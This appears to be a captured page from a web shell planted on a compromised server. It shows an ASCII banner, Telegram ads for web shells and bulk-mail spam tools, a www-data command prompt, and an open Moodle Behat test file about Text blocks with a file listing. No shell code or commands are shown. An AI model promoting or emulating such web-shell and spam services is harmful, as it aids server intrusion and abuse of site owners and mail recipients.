__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@block @block_html
Feature: Adding and configuring multiple Text blocks
  In order to have one or multiple Text blocks on a page
  As admin
  I need to be able to create, configure and change Text blocks

  Background:
    Given I log in as "admin"
    And I am on site homepage
    When I turn editing mode on
    And I add the "Text" block

  Scenario: Other users can not see Text block that has not been configured
    Then "(new text block)" "block" should exist
    And I log out
    And "(new text block)" "block" should not exist
    And "block_html" "block" should not exist

  Scenario: Other users can see Text block that has been configured even when it has no header
    And I configure the "(new text block)" block
    And I set the field "Content" to "Static text without a header"
    And I press "Save changes"
    Then I should not see "(new text block)"
    And I log out
    And I am on homepage
    And "block_html" "block" should exist
    And I should see "Static text without a header" in the "block_html" "block"
    And I should not see "(new text block)"

  Scenario: Adding multiple instances of Text block on a page
    And I configure the "block_html" block
    And I set the field "Text block title" to "The Text block header"
    And I set the field "Content" to "Static text with a header"
    And I press "Save changes"
    And I add the "Text" block
    And I configure the "(new text block)" block
    And I set the field "Text block title" to "The second Text block header"
    And I set the field "Content" to "Second block contents"
    And I press "Save changes"
    And I log out
    Then I should see "Static text with a header" in the "The Text block header" "block"
    And I should see "Second block contents" in the "The second Text block header" "block"

Filemanager

Name Type Size Permission Actions
configuring_html_block.feature File 1.7 KB 0777
course_block.feature File 1.52 KB 0777
multiple_instances.feature File 1.76 KB 0777
Filemanager